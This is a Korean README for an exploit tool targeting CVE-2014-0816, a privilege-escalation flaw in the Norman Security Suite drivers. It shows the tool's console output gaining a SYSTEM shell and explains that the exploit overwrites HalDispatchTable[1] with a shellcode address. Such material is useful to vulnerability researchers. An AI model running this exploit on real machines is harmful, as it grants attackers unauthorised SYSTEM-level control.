
CVE-2014-0816
이것은 CVE-2014-0816 (JVNDB-2014-000026: Norman Security Suite에서 권한 상승 취약점)에 대한 익스플로잇입니다.
이 익스플로잇은 ngs.sys / ngs64.sys의 IOCTL 핸들러 취약점을 이용하여 비관리자 권한에서 SYSTEM 권한으로 CMD.exe를 실행합니다.
C:\Users\user\Desktop> exploit_ngs.exe
[*] Exploit Norman General Security Driver (ngs.sys / ngs64.sys)
[*] Target file version: ver 5.0.740.0.
[*] An address file was created at C:\Users\user\Desktop\address.bin.
[*] Shellcode is located at 000000013F9357D0.
[*] The device was opened as 0000000000000044.
[*] The address file was opened as FFFFFFFF80000558.
[+] HalDispatchTable[1] is located at FFFFF800033FDC68.
[+] HalDispatchTable[1] was altered.
[+] Shellcode was executed.
[+] The SYSTEM shell was launched.
[*] Press any key to finish this program.
그러면 새 콘솔이 나타납니다.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Users\user\Desktop>whoami
nt authority\system
이 취약점을 통해 공격자는 임의의 주소에 임의의 값을 덮어쓸 수 있으므로, 이 익스플로잇은 HalDispatchTable[1]의 값을 현재 프로세스의 권한을 SYSTEM 권한으로 상승시키는 쉘코드의 주소로 변경합니다.

이 취약점은 Windows XP부터 8까지 x86/x64 모든 플랫폼에서 악용 가능하지만, 이 익스플로잇은 특정 플랫폼에서만 설계 및 테스트되었습니다 (예: SMEP 때문에 Windows 8에서는 작동하지 않습니다).
이 소프트웨어는 MIT 라이선스로 제공됩니다. LICENSE 파일을 참조하십시오.